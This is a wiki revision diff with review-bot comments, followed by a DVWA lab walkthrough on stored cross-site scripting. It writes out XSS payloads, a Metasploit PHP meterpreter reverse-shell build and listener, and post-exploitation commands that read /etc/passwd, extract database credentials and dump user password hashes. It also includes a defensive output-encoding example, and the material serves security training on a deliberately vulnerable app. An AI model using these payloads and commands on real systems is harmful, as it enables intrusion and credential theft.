Difference between revisions of "DVWA: XSS"

From OnnoWiki
Line 116: Line 116:
 
Message:
 
Message:
  
     <script>window.location="http://192.168.1.106/dvwa/hackable/uploads/FORUM_BUG.php" </script>
+
     <script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php" </script>
 
         Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
 
         Replace 192.168.1.106 with the IP Address obtain from Fedora 14 in (Section 3, Step 3).
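Review bot: the replacement line in this hunk now points at http://192.168.0.100/DVWA-1.9/..., but the instruction beneath it still tells the reader to replace 192.168.1.106 and refers to Fedora 14 and "Section 3, Step 3", which belong to the original computersecuritystudent lesson rather than to this page, whose DVWA host address comes from the ifconfig step. Update it to match, e.g. `Replace 192.168.0.100 with the DVWA host's IP address obtained with ifconfig above.`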
  
Line 141: Line 141:
 
     grep "db_" /var/www/html/dvwa/config/config.inc.php
 
     grep "db_" /var/www/html/dvwa/config/config.inc.php
 
         This produces the database name, username, and password information to log into the mysql database.
 
         This produces the database name, username, and password information to log into the mysql database.
     echo "use dvwa; show tables;" | mysql -uroot -pdvwaPASSWORD
+
     echo "use dvwa; show tables;" | mysql -uroot -p123456
 
         This command produces a table list of the dvwa database.
 
         This command produces a table list of the dvwa database.
     echo "use dvwa; desc users;" | mysql -uroot -pdvwaPASSWORD
+
     echo "use dvwa; desc users;" | mysql -uroot -p123456
 
         This command describes the columns of the users table in the dvwa datase.
 
         This command describes the columns of the users table in the dvwa datase.
     echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD
+
     echo "select user,password from dvwa.users;" | mysql -uroot -p123456
 
         This command displays the user and password information for each user in the dvwa.users table.
 
         This command displays the user and password information for each user in the dvwa.users table.
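Review bot: the three mysql lines swap the dvwaPASSWORD placeholder for the literal 123456, yet the grep on /var/www/html/dvwa/config/config.inc.php two lines above is precisely the step that discovers the real db_user/db_password, and that grep path still says /dvwa/ although the payload URL changed in this same revision moved to /DVWA-1.9/. Either keep the placeholder and tell the reader to substitute the db_password value printed by the grep, or make the path consistent with the rest of the revision, e.g. `grep "db_" /var/www/html/DVWA-1.9/config/config.inc.php`.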
  
Line 152: Line 152:
 
         Place the html <pre> tag in the xss.html file.
 
         Place the html <pre> tag in the xss.html file.
 
         The <pre> is used as a pre-formatter.
 
         The <pre> is used as a pre-formatter.
     echo "select user,password from dvwa.users;" | mysql -uroot -pdvwaPASSWORD >> /var/www/html/dvwa/hackable/uploads/xss.html
+
     echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/dvwa/hackable/uploads/xss.html
 
         Place user and password for the dvwa.users table in the xss.html file.
 
         Place user and password for the dvwa.users table in the xss.html file.
 
     echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
 
     echo "</pre>" >> /var/www/html/dvwa/hackable/uploads/xss.html
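Review bot: the `>>` targets in this hunk still write to /var/www/html/dvwa/hackable/uploads/xss.html, while the URL the reader is told to open in the next hunk is http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html and the page's own `cd /var/www/html/DVWA-1.9/...` shows that is where this install lives; the file ends up in a directory the browser never fetches. Change all three targets to `/var/www/html/DVWA-1.9/hackable/uploads/xss.html`.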
Line 164: Line 164:
  
 
     On BackTrack, place the below URI in Firefox
 
     On BackTrack, place the below URI in Firefox
         http://192.168.1.106/dvwa/hackable/uploads/xss.html
+
         http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html
 
             Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
 
             Replace the above IP address with the IP Address obtained in (Section 3, Step 3).
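Review bot: the URL is updated to 192.168.0.100/DVWA-1.9, but the surrounding text still says "On BackTrack" and points at "Section 3, Step 3", while this page's attacker box is Kali Linux and the DVWA address comes from the ifconfig step at the top. Reword to `On Kali Linux, open the URL below in Firefox` and `Replace 192.168.0.100 with the DVWA host's IP address obtained with ifconfig above`.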
  

Revision as of 09:35, 28 May 2017

Source: http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson9/index.html

Objectives

  • Test a basic cross site scripting (XSS) attack
  • Test an iframe cross site scripting (XSS) attack
  • Test a cookie cross site scripting (XSS) attack
  • Create a php/meterpreter/reverse_tcp payload
  • Start the php/meterpreter/reverse_tcp listener
  • Upload the PHP payload to the DVWA Upload screen
  • Test a PHP Payload cross site scripting (XSS) attack


On the DVWA side

Check the IP address of the DVWA host (it is used in every payload and URL below)

ifconfig


Widen the Stored Cross Site Scripting (XSS) Comment Box

Edit index.php

cd /var/www/html/DVWA-1.9/vulnerabilities/xss_s/
vi index.php

Search for the keyword mtxMessage and change maxlength=50

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"50\"></textarea>

to maxlength=250, so that the longer payloads used below fit in the box. This only widens a browser-side limit: maxlength is not enforced by the server, so an attacker who cannot edit this file would bypass it just as easily with an intercepting proxy or by editing the attribute in the browser's developer tools.

<textarea name=\"mtxMessage\" cols=\"50\" rows=\"3\" maxlength=\"250\"></textarea>

On the Kali Linux side

Check the Kali Linux IP address (this is the LHOST the PHP payload will connect back to)

ifconfig -a

Allow pop-ups in Firefox (otherwise the alert and redirect tests may be blocked)

Open Firefox
Preferences > Content > Uncheck "Block pop-up windows"

Log in to DVWA

  • Login
  • DVWA Security > Low

XSS Stored Basic Exploit Test

  • Click > XSS (Stored)
  • In Name enter "Test 1"
  • In Message enter "<script>alert("This is an XSS Exploit Test")</script>"
  • Click > Sign Guestbook

The alert appears immediately and again every time anyone views the guestbook: the script is stored in the database, and DVWA at Low security writes it back into the page without encoding it, which is what makes this a stored XSS rather than a one-off reflected one.
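Why the alert fires: the stored name and message are concatenated straight into the guestbook HTML. The following is an added example, not DVWA's own code: a JavaScript model of that unencoded rendering beside a hardened version that entity-encodes both fields at output time. The markup around the entry and the function names are assumptions; the three payloads are the ones used in this lesson.

```javascript
// Added example (not DVWA's code): the unencoded guestbook rendering that makes
// a stored payload execute, beside a hardened version. The markup and function
// names are assumptions; the payloads are the ones used in this lesson.

// Entity-encode the five characters that can break out of an HTML text context.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Low security: name and message are concatenated straight into the page, so
// any tag inside them becomes live markup for every later visitor.
function renderEntryLow(name, message) {
  return '<div id="guestbook_comments">Name: ' + name + '<br />' +
         'Message: ' + message + '<br /></div>';
}

// Hardened: same markup, but both stored fields are encoded when written out.
// Entity encoding is correct for HTML body context only; a value placed inside
// an attribute, a URL or an inline script needs the encoder for that context.
function renderEntryHardened(name, message) {
  return '<div id="guestbook_comments">Name: ' + escapeHtml(name) + '<br />' +
         'Message: ' + escapeHtml(message) + '<br /></div>';
}

// Crude check: does the rendered HTML still contain a tag or event handler the
// browser would treat as executable or embeddable?
function hasActiveMarkup(html) {
  return /<(script|iframe|img|svg|object)\b|\son\w+\s*=/i.test(html);
}

// Constructed sample input: the three payloads from this lesson.
const PAYLOADS = [
  '<script>alert("This is an XSS Exploit Test")</script>',
  '<iframe src="http://www.cnn.com"></iframe>',
  '<script>alert(document.cookie)</script>',
];

// Render each payload both ways and report whether it stays live.
function demo() {
  return PAYLOADS.map((p) => ({
    payload: p,
    low: hasActiveMarkup(renderEntryLow('Test', p)),
    hardened: hasActiveMarkup(renderEntryHardened('Test', p)),
  }));
}

console.log(JSON.stringify(demo(), null, 2));
```

Every payload reports `low: true, hardened: false`: the hardened output still displays the attacker's text verbatim, but as `&lt;script&gt;...`, which the browser shows instead of executing.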

XSS Stored IFRAME Exploit Test

  • Reset the DVWA database so that payloads stored by earlier tests no longer fire.
  • Click > XSS (Stored)
  • In Name enter "Test 2"
  • In Message enter "<iframe src="http://www.cnn.com"></iframe>"
  • Click > Sign Guestbook

The CNN page is rendered inside the guestbook, below "Test 2". Many sites now send an X-Frame-Options or Content-Security-Policy frame-ancestors header that forbids framing; if the frame stays blank, point src at a host you control instead.

       This is powerful because an attacker can use SET (the Social-Engineer Toolkit) to clone a legitimate site, host the clone, and frame it here, so that visitors to the guestbook see a credential-harvesting page inside a site they already trust.
           e.g., Social Engineering Toolkit (SET): Lesson 3: Create Malicious Weblink, Install Virus, Capture Forensic Images

XSS Stored COOKIE Exploit Test

  • Reset the DVWA database so that payloads stored by earlier tests no longer fire.
  • Click > XSS (Stored)
  • In Name enter "Test 3"
  • In Message enter "<script>alert(document.cookie)</script>"
  • Click > Sign Guestbook


   The alert shows the cookies the web server set for the current browser session (the PHP session ID and DVWA's security-level cookie).
   An attacker only has to change this script to send document.cookie to a host they control instead of displaying it; every user who views the guestbook then hands over a live session.
   Imagine the same flaw on a bank website: each time a user logs in and views the page, their session cookie is sent to the attacker. Marking the session cookie HttpOnly would stop document.cookie from exposing it, but does not remove the XSS itself.


Build the PHP payload with msfpayload

   mkdir -p /root/backdoor
   cd /root/backdoor
   msfpayload php/meterpreter/reverse_tcp LHOST=192.168.1.105 LPORT=4444 R > FORUM_BUG.php
   ls -l FORUM_BUG.php

   LHOST is the Kali Linux address from the ifconfig step above (192.168.1.105 here): it is the address the DVWA web server will connect back to, and LPORT must match the handler started below. msfpayload has been removed from current Metasploit releases; on a current Kali build the same file with msfvenom, using the same payload name, LHOST and LPORT and raw output format.

Upload the payload to DVWA

   In DVWA select "Upload" from the left navigation menu, click Browse, choose /root/backdoor/FORUM_BUG.php and upload it. At Low security the file is accepted without any check and stored under hackable/uploads/, which is the path the window.location payload below points at.

Start msfconsole and the handler


       msfconsole

   use exploit/multi/handler
   set PAYLOAD php/meterpreter/reverse_tcp
   set LHOST 192.168.1.105
   set LPORT 4444
   exploit

   The handler waits for the web server to connect back on port 4444; LHOST and LPORT must be the values the payload was built with.


XSS Stored window.location Exploit Test

  • Reset the DVWA database so that payloads stored by earlier tests no longer fire.
  • Click > XSS (Stored)

Name: Test 4
Message:

   <script>window.location="http://192.168.0.100/DVWA-1.9/hackable/uploads/FORUM_BUG.php"</script>
       Replace 192.168.0.100 with the DVWA host's IP address obtained with ifconfig above.

Click Sign Guestbook. If an alert from an earlier test is still stored, click OK to dismiss it.

   The script only sends the viewing browser to the uploaded file. The web server then executes FORUM_BUG.php, so the meterpreter session that opens in msfconsole runs on the DVWA host as the web server's user, not in the victim's browser, and every later visitor to the guestbook triggers it again.

shell

   Drops from meterpreter to a system ("sh") shell on the DVWA host.

tail /etc/passwd

   Lists local accounts, a potential target list for an ssh brute-force attack.

whoami

   Shows which user the web server, and therefore this shell, runs as.

grep apache /etc/passwd

   Obtains the home directory of the apache user.

find /var/www/* -print | grep config

   Finds all configuration files under /var/www; the DVWA one holds the database credentials.


   grep "db_" /var/www/html/DVWA-1.9/config/config.inc.php
       Prints the database name, username and password the application uses to log in to MySQL (adjust the path to where DVWA is installed; on this lab it is /var/www/html/DVWA-1.9).
   echo "use dvwa; show tables;" | mysql -uroot -p123456
       Lists the tables of the dvwa database. 123456 is the db_password this lab's config.inc.php contains; use whatever the grep above returned.
   echo "use dvwa; desc users;" | mysql -uroot -p123456
       Describes the columns of the users table in the dvwa database.
   echo "select user,password from dvwa.users;" | mysql -uroot -p123456
       Displays the user name and stored password hash for each user in the dvwa.users table.


   echo "<pre>" >> /var/www/html/DVWA-1.9/hackable/uploads/xss.html
       Places the opening HTML <pre> tag in xss.html; <pre> keeps the line breaks of the query output. The file is written to the same directory the URL in the next step is served from.
   echo "select user,password from dvwa.users;" | mysql -uroot -p123456 >> /var/www/html/DVWA-1.9/hackable/uploads/xss.html
       Appends the user and password columns of dvwa.users to xss.html.
   echo "</pre>" >> /var/www/html/DVWA-1.9/hackable/uploads/xss.html
       Places the closing </pre> tag in xss.html.
   echo "Your Name" >> /var/www/html/DVWA-1.9/hackable/uploads/xss.html
       Replace the string "Your Name" with your actual name.
   date >> /var/www/html/DVWA-1.9/hackable/uploads/xss.html
       Appends a timestamp.



   On Kali Linux, open the URL below in Firefox
       http://192.168.0.100/DVWA-1.9/hackable/uploads/xss.html
           Replace 192.168.0.100 with the DVWA host's IP address obtained with ifconfig above. The page shows the user names and password hashes pulled from the database, served by the compromised web server itself.

References